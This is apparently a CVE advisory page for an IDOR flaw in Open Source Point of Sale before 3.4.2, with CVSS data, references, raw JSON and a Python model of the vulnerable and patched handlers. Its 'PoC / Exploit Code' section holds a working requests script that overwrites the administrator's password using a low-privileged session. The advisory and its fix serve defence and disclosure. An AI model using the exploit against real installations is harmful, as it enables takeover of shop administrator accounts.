Security Vulnerability Report
CVE-2026-33730 CVSS 6.5 MEDIUM

CVE-2026-33730

Published: 2026-03-27 01:16:21
Last Modified: 2026-04-01 15:05:18

Description

Open Source Point of Sale (opensourcepos) is a web based point of sale application written in PHP using CodeIgniter framework. Prior to version 3.4.2, an Insecure Direct Object Reference (IDOR) vulnerability allows an authenticated low-privileged user to access the password change functionality of other users, including administrators, by manipulating the `employee_id` parameter. The application does not verify object ownership or enforce authorization checks. Version 3.4.2 adds object-level authorization checks to validate that the current user owns the employee_id being accessed.
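The authorization gap and the fix described above, modelled as an added Python example (this is not opensourcepos code; the `User`, `save_employee_*` and `AuthorizationError` names, the administrator exception and the sample records are assumptions made for illustration):

```python
from dataclasses import dataclass


class AuthorizationError(Exception):
    """Raised when the session user is not allowed to act on the requested record."""


@dataclass
class User:
    """Assumed shape of the server-side session identity (not an opensourcepos type)."""
    employee_id: int
    username: str
    is_admin: bool = False


def save_employee_vulnerable(current_user: User, form: dict, db: dict) -> int:
    """Pre-3.4.2 behaviour (CWE-639): employee_id is taken from the request and
    trusted, so any authenticated user can overwrite any other user's password."""
    target_id = int(form["employee_id"])
    db[target_id] = form["password"]
    return target_id


def authorize_employee_access(current_user: User, target_id: int) -> None:
    """Object-level authorization: the session user must own the employee_id.
    Letting administrators edit other records is an assumption of this example."""
    if current_user.employee_id == target_id or current_user.is_admin:
        return
    raise AuthorizationError(
        f"user {current_user.employee_id} may not modify employee {target_id}"
    )


def save_employee_hardened(current_user: User, form: dict, db: dict) -> int:
    """Post-fix shape: validate the identifier, check ownership against the
    server-side session identity, and only then touch the record."""
    try:
        target_id = int(form["employee_id"])
    except (KeyError, TypeError, ValueError):
        raise ValueError("employee_id must be an integer")
    authorize_employee_access(current_user, target_id)
    if form.get("password") != form.get("password_repeat"):
        raise ValueError("password confirmation does not match")
    db[target_id] = form["password"]
    return target_id


def run_scenario() -> dict:
    """Replay the advisory's scenario against both handlers and return the
    outcomes as a dict so they can be inspected or asserted on."""
    # Constructed sample data: employee 1 is the administrator, employee 7 a cashier.
    cashier = User(employee_id=7, username="cashier")
    tampered = {"employee_id": "1", "password": "new-pass", "password_repeat": "new-pass"}
    own = {"employee_id": "7", "password": "own-pass", "password_repeat": "own-pass"}

    vuln_db = {1: "admin-hash", 7: "cashier-hash"}
    save_employee_vulnerable(cashier, tampered, vuln_db)

    safe_db = {1: "admin-hash", 7: "cashier-hash"}
    try:
        save_employee_hardened(cashier, tampered, safe_db)
        denied = False
    except AuthorizationError:
        denied = True
    save_employee_hardened(cashier, own, safe_db)

    return {
        "vulnerable_admin_overwritten": vuln_db[1] == "new-pass",
        "hardened_denied": denied,
        "hardened_admin_intact": safe_db[1] == "admin-hash",
        "hardened_own_changed": safe_db[7] == "own-pass",
    }


if __name__ == "__main__":
    for check, result in run_scenario().items():
        print(f"{check}: {result}")
```

The point of the hardened version is that the decision is made against the identity stored server-side in the session, never against anything the client sends; the `employee_id` parameter is only used after that check has passed.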

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:opensourcepos:open_source_point_of_sale:*:*:*:*:*:*:*:* - VULNERABLE
Open Source Point of Sale < 3.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL configuration
target_url = "http://target-opensourcepos.com/index.php/employees/save/1"

# Attacker's session cookie (low-privileged user)
session_cookie = "ci_session=attacker_session_value_here"

# Headers
headers = {
    "Cookie": session_cookie,
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent": "Mozilla/5.0 (PoC-Scanner)"
}

# Payload data
# Note: 'employee_id' is usually a hidden field or part of the URL,
# but here we simulate manipulating the data sent to the backend.
payload_data = {
    "employee_id": "1",
    "username": "admin",
    "password": "newHackedPassword123!",
    "password_repeat": "newHackedPassword123!"
}

try:
    # Sending the request to reset the admin password (ID: 1)
    response = requests.post(target_url, data=payload_data, headers=headers)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check if the password for employee_id 1 (Admin) has been changed.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

https://github.com/opensourcepos/opensourcepos/commit/ee4d44ed396097d6010c5490ab4fd7cfae694624 (Patch)
https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-mcc2-8rp2-q6ch (Exploit, Mitigation, Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33730", "sourceIdentifier": "[email protected]", "published": "2026-03-27T01:16:20.577", "lastModified": "2026-04-01T15:05:18.343", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open Source Point of Sale (opensourcepos) is a web based point of sale application written in PHP using CodeIgniter framework. Prior to version 3.4.2, an Insecure Direct Object Reference (IDOR) vulnerability allows an authenticated low-privileged user to access the password change functionality of other users, including administrators, by manipulating the `employee_id` parameter. The application does not verify object ownership or enforce authorization checks. Version 3.4.2 adds object-level authorization checks to validate that the current user owns the employee_id being accessed."}, {"lang": "es", "value": "Open Source Point of Sale (opensourcepos) es una aplicación de punto de venta basada en la web escrita en PHP utilizando el framework CodeIgniter. Antes de la versión 3.4.2, una vulnerabilidad de Referencia Directa Insegura a Objeto (IDOR) permite a un usuario autenticado con bajos privilegios acceder a la funcionalidad de cambio de contraseña de otros usuarios, incluidos los administradores, manipulando el parámetro 'employee_id'. La aplicación no verifica la propiedad del objeto ni aplica comprobaciones de autorización. La versión 3.4.2 añade comprobaciones de autorización a nivel de objeto para validar que el usuario actual es propietario del 'employee_id' al que se accede."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensourcepos:open_source_point_of_sale:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.4.2", "matchCriteriaId": "401D867E-4CA1-48F9-9C5D-492BCAAC8106"}]}]}], "references": [{"url": "https://github.com/opensourcepos/opensourcepos/commit/ee4d44ed396097d6010c5490ab4fd7cfae694624", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-mcc2-8rp2-q6ch", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}